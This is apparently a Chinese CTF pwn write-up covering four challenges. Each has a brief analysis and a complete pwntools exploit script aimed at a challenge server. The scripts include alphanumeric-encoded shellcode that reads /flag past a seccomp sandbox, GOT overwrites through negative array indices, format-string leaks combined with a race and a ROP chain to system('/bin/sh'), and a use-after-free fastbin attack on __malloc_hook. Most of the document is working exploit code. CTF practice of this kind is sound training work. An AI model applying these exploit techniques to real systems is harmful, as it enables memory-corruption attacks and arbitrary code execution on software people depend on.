alphashell
分析
要求输入的shellcode全部为可见(可打印)字符，因此先用AE64把原始shellcode编码成纯字母数字形式再发送。
sandbox禁用了open、write、writev、read和execve等系统调用，因此改用未被禁止的openat打开/flag，再用sendfile把文件内容直接送到stdout(fd 1)，全程不经过read/write。
EXP
from pwn import *
from ctypes import *
from ae64 import AE64
#----------------function area start----------------#
def sla(ch, data):
    """Wait for *ch* on the connection, then send *data* followed by a newline."""
    return p.sendlineafter(ch, data)


def sda(ch, data):
    """Wait for *ch*, then send *data* with no trailing newline."""
    return p.sendafter(ch, data)


def sd(data):
    """Raw send, no newline."""
    return p.send(data)


def sl(data):
    """Send *data* plus a newline."""
    return p.sendline(data)


def addr32():
    """Leak helper: read up to the first 0xf7 byte and unpack the last 4 bytes
    as a little-endian 32-bit address (assumes the first 0xf7 on the wire is
    the top byte of the leaked pointer)."""
    raw = p.recvuntil(b"\xf7")
    return u32(raw[-4:])


def addr64():
    """Leak helper: read up to the first 0x7f byte, take the last 6 bytes and
    zero-extend to 8 for a little-endian 64-bit address. Fragile: any earlier
    0x7f byte in the output truncates the read in the wrong place."""
    raw = p.recvuntil(b"\x7f")
    return u64(raw[-6:].ljust(8, b"\x00"))


def lg(addr_name, addr):
    """Log *addr* under *addr_name* at success level, rendered in hex."""
    return log.success("{} --> {}".format(addr_name, hex(addr)))


def ru(con):
    """Receive until *con* appears and return everything read."""
    return p.recvuntil(con)
def debug(bp=0):
    """Attach gdb to the live target (optionally with breakpoint/script *bp*)
    and block until the user resumes."""
    gdb.attach(p, bp)
    pause()
#----------------function area end------------------#
p = process("./attachment")
# p = remote('125.70.243.22','31709')
# context.log_level = 'debug'
context.arch='amd64'
# Raw shellcode. open/read/write are blocked by the sandbox, so it does
# openat(0, "/flag", O_RDONLY) followed by sendfile(1, fd, NULL, 0x100),
# which copies the file to stdout without a read/write syscall.
# 0x67616c662f pushed as a qword is "/flag\0\0\0" in little-endian; the dirfd
# in rdi is ignored for an absolute path. The leading `xor rsi,rsi` is
# redundant (rsi is set to rsp below) but the string is kept byte-for-byte.
sc=asm('''
xor rsi,rsi
mov rbx,0x67616c662f
push rbx
mov rdx,0
xor r10,r10
mov rdi,r10
mov rsi, rsp
mov eax,SYS_openat
syscall
mov rsi,rax
mov r10,0x100
xor rdx,rdx
mov rdi,1
mov eax,SYS_sendfile
syscall
''')
# AE64 re-encodes the shellcode as printable alphanumeric bytes (the target
# only accepts visible characters). 'rdx' is passed as the register that holds
# the buffer address when the encoded stub runs -- confirm against the binary.
obj = AE64()
payload = obj.encode(sc,'rdx')
# debug()
p.send(payload)
p.interactive()
beverage store
分析
索引的类型转换有误(负数下标未被拦截)，因此可以用负下标反向越界，改写数组之前的内容(这里是GOT表项)。
对于这道题,可以先修改exit got,让程序重新走一遍流程;
接着泄露libc地址,把printf got改为system,最后把exit got重新改为后门函数地址即可
EXP
from pwn import *
from ctypes import *
#----------------function area start----------------#
def sla(ch, data):
    """sendlineafter shorthand: wait for *ch*, then send *data* + newline."""
    return p.sendlineafter(ch, data)


def sda(ch, data):
    """sendafter shorthand: wait for *ch*, then send *data* as-is."""
    return p.sendafter(ch, data)


def sd(data):
    """send shorthand."""
    return p.send(data)


def sl(data):
    """sendline shorthand."""
    return p.sendline(data)


def addr32():
    """Unpack the 4 bytes ending at the first 0xf7 as a 32-bit little-endian
    address (typical libc pointer on 32-bit; fragile if 0xf7 shows up earlier)."""
    chunk = p.recvuntil(b"\xf7")[-4:]
    return u32(chunk)


def addr64():
    """Unpack the 6 bytes ending at the first 0x7f as a 64-bit little-endian
    address, padding to 8 bytes (fragile if 0x7f shows up earlier)."""
    chunk = p.recvuntil(b"\x7f")[-6:]
    return u64(chunk.ljust(8, b"\x00"))


def lg(addr_name, addr):
    """Success-log *addr_name* --> hex(*addr*)."""
    return log.success("{} --> {}".format(addr_name, hex(addr)))


def ru(con):
    """recvuntil shorthand."""
    return p.recvuntil(con)
def debug(bp=0):
    """Attach gdb to the target with optional breakpoint/script *bp*, then
    pause so the debugger can be inspected before continuing."""
    gdb.attach(p, bp)
    pause()
#----------------function area end------------------#
# p = process("./pwn")
p = remote('125.70.243.22','31668')
libc = ELF('./libc.so.6')
# The challenge libc loaded through ctypes so rand() can be replayed locally.
clibc = cdll.LoadLibrary('./libc.so.6')
context.log_level='debug'
ru("id")
# 0x10 bytes of 'B'; the first 4 bytes (0x42424242) are presumably what the
# binary feeds to srand(), so seeding with the same value predicts the code.
p.send(b'B'*0x10)
clibc.srand(0x42424242)
num = clibc.rand()
ru("code:")
sl(str(num))
sleep(1)
# Negative indices pass the bounds check (type-confusion) and write before the
# array, into the GOT. Offsets -4/-6/-7 are specific to this binary.
# -4: exit GOT per the write-up; two adjacent entries written at once.
sl(b'-4')
payload = p64(0x40133B) + p64(0x401511)
sd(payload)
# -6: a single byte is written and the echoed response carries a libc pointer
sl(b'-6')
sleep(1)
sd(b'a')
# 0x46061 is the hard-coded distance between the leaked pointer and libc base
# for the shipped libc.so.6 -- must be recomputed for any other libc.
libc_base = addr64() - 0x46061
lg('libc_base',libc_base)
system = libc_base + libc.sym['system']
sleep(1)
# -7: printf GOT -> system (per the write-up)
sl(b'-7')
payload = p64(system)
sd(payload)
# -4 again: exit GOT -> backdoor address (per the write-up)
sl(b'-4')
sleep(1)
payload = p64(0x401511)
sd(payload)
p.interactive()
Offensive_Security
分析
多线程处理但未对共享资源加锁(存在竞争条件)，连续两次输入同样的字符串即可绕过限制(脚本中连发两次'1')
存在格式化字符串漏洞,可泄露密码和libc基址(%7$s泄露密码字符串,%39$p泄露栈上的libc指针)
最后利用栈溢出构造ROP链(pop rdi -> "/bin/sh" -> system)拿到shell
EXP
from pwn import *
from ctypes import *
#----------------function area start----------------#
def sla(ch, data):
    """Send *data* plus newline once *ch* has been received."""
    return p.sendlineafter(ch, data)


def sda(ch, data):
    """Send *data* (no newline) once *ch* has been received."""
    return p.sendafter(ch, data)


def sd(data):
    """Send *data* raw."""
    return p.send(data)


def sl(data):
    """Send *data* with a trailing newline."""
    return p.sendline(data)


def addr32():
    """Read through the first 0xf7 byte and decode the last 4 bytes as a
    little-endian 32-bit pointer. Assumes nothing before the leak contains 0xf7."""
    return u32(p.recvuntil(b"\xf7")[-4:])


def addr64():
    """Read through the first 0x7f byte and decode the last 6 bytes (zero
    padded to 8) as a little-endian 64-bit pointer. Assumes nothing before the
    leak contains 0x7f."""
    tail = p.recvuntil(b"\x7f")[-6:]
    padded = tail.ljust(8, b"\x00")
    return u64(padded)


def lg(addr_name, addr):
    """Print a success line "<name> --> 0x..." for a leaked address."""
    return log.success("{} --> {}".format(addr_name, hex(addr)))


def ru(con):
    """Read until *con* and return the data."""
    return p.recvuntil(con)
def debug(bp=0):
    """Attach gdb (optional breakpoint/script *bp*) and pause the exploit."""
    gdb.attach(p, bp)
    pause()
#----------------function area end------------------#
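# p = process("./attachment")
elf = ELF('./attachment')
# Assumes the remote libc matches the local one; the 0x21b780 offset below
# and the ROP gadgets are only valid for that pairing.
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
# context.log_level = 'debug'
# addr64() stops at the first 0x7f byte, so the leak is only usable when the
# pointer has the expected low byte. Reconnect until a good instance is found.
while True:
    sleep(1)
    p = None  # so the cleanup below never touches an unbound name
    try:
        p = remote('125.70.243.22','31652')
        sleep(0.1)
        # %7$s dumps the password string, %39$p a libc pointer from the stack
        sla('Username:','%7$s%39$p')
        ru('Welcome, \n')
        passwd = p.recv(8)
        sleep(0.1)
        sl(passwd)
        libc_leak = addr64()
        lg('libc_leak',libc_leak)
        if (libc_leak & 0xff) != 0x80:
            # Raising a plain str used to be a TypeError swallowed by a bare
            # except; raise a real exception so the retry is intentional.
            raise RuntimeError('环境有毛病')
        libc_base = libc_leak - 0x21b780
        lg('libc base',libc_base)
        # same answer sent twice back-to-back: races the unlocked check
        sl('1')
        sl('1')
        # one_gadget candidates kept for reference; the chain below uses system()
        ogs = [0xebc81,0xebc85,0xebc88]
        # 0x28 bytes to the saved return address, then (presumably) a `ret`
        # for stack alignment and a `pop rdi; ret` -- verify against the binary.
        payload = (b'A'*0x28
                   + p64(0x0000000000400462)
                   + p64(0x0000000000400661)
                   + p64(libc_base+next(libc.search(b'/bin/sh')))
                   + p64(libc_base+libc.sym.system))
        sla('>',payload)
        p.interactive()
        break
    except Exception as exc:
        # Only retry on real failures; a bare except also swallowed Ctrl-C.
        log.info('attempt failed, retrying: {!r}'.format(exc))
        if p is not None:
            p.close()
        continue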
hijack_vtable
分析
add、show、delete、edit对已释放的chunk都没有限制(UAF可读可写)：先释放一个unsorted bin大小的chunk并show泄露libc地址，再对已释放的fastbin chunk改写fd做fastbin attack，把__malloc_hook改为libc内的一个gadget(脚本中为libc_base+0xd5c07，应为one_gadget)，最后再malloc一次触发。
EXP
from pwn import *
from ctypes import *
#----------------function area start----------------#
def sla(ch, data):
    """Wait for *ch*, then sendline *data*."""
    return p.sendlineafter(ch, data)


def sda(ch, data):
    """Wait for *ch*, then send *data*."""
    return p.sendafter(ch, data)


def sd(data):
    """Alias for p.send."""
    return p.send(data)


def sl(data):
    """Alias for p.sendline."""
    return p.sendline(data)


def addr32():
    """Decode a 32-bit little-endian leak ending in 0xf7 (first such byte
    received; earlier 0xf7 bytes would cut the read short)."""
    buf = p.recvuntil(b"\xf7")
    return u32(buf[-4:])


def addr64():
    """Decode a 64-bit little-endian leak ending in 0x7f (first such byte
    received; earlier 0x7f bytes would cut the read short)."""
    buf = p.recvuntil(b"\x7f")
    six = buf[-6:]
    return u64(six.ljust(8, b"\x00"))


def lg(addr_name, addr):
    """Success-log a named address in hex."""
    return log.success("{} --> {}".format(addr_name, hex(addr)))


def ru(con):
    """Alias for p.recvuntil."""
    return p.recvuntil(con)
def debug(bp=0):
    """Attach gdb to the process, passing *bp* through as the breakpoint/script,
    then pause until resumed."""
    gdb.attach(p, bp)
    pause()
#----------------function area end------------------#
# p = process("./pwn")
# Symbol offsets (system, __malloc_hook) come from the libc shipped with the task.
libc = ELF('./libc.so.6')
p = remote('125.70.243.22','31986')
context.log_level = 'debug'
def cmd(choice):
    """Answer the menu prompt with *choice*."""
    sla('choice:', f'{choice}')
def add(idx, size):
    """Menu 1: allocate *size* bytes into slot *idx*.

    A short sleep precedes each answer because the prompts arrive separately.
    """
    cmd(1)
    for prompt, value in (('index', idx), ('size', size)):
        sleep(0.1)
        sla(prompt, str(value))
def delete(idx):
    """Menu 2: free slot *idx* (the exploit relies on the slot staying usable
    after the free -- see show/edit on freed chunks below)."""
    cmd(2)
    sla('index', f'{idx}')
def edit(idx, len, con):
    """Menu 3: write *len* bytes of *con* into slot *idx*.

    The parameter named ``len`` shadows the builtin; it is kept for call
    compatibility and the builtin is not needed here.
    """
    cmd(3)
    sla('index', str(idx))
    for prompt, value in (('length:', str(len)), ('content:', con)):
        sleep(0.1)
        sla(prompt, value)
def show(idx):
    """Menu 4: print the contents of slot *idx*."""
    cmd(4)
    sla('index', f'{idx}')
# chunk 0: 0x110-byte chunk (too big for a fastbin); chunk 1: 0x70 fast chunk,
# presumably also there to keep chunk 0 from merging into top when freed.
add(0,0x100)
add(1,0x60)
# Free chunk 0 and read it back (no UAF check): its fd field now holds a
# pointer into libc's arena.
delete(0)
show(0)
# 0x39bb78 is the hard-coded distance from that leaked pointer to libc base
# for the shipped libc.so.6 -- recompute for any other libc.
libc_base = addr64() - 0x39bb78
lg('libc base',libc_base)
# __malloc_hook is only honoured by glibc versions that still have hooks (< 2.34).
malloc_hook = libc_base + libc.symbols['__malloc_hook']
# Fastbin attack: free chunk 1, then overwrite its fd (UAF write) with a fake
# chunk just before __malloc_hook. -0x23 presumably lines the fake size field up
# with a 0x7f byte so it passes the fastbin size check for the 0x70 bin.
delete(1)
edit(1,0x10,p64(malloc_hook - 0x23))
add(0,0x100)
# first 0x60 alloc returns the real chunk 1, the second returns the fake chunk
add(1,0x60)
add(2,0x60)
# 0x13 bytes of padding land the qword exactly on __malloc_hook;
# libc_base+0xd5c07 is presumably a one_gadget for this libc -- verify.
edit(2,0x30,b'a'*0x13 + p64(libc_base + 0xd5c07))
# any malloc now goes through the hook
add(3,0x10)
# debug()
p.interactive()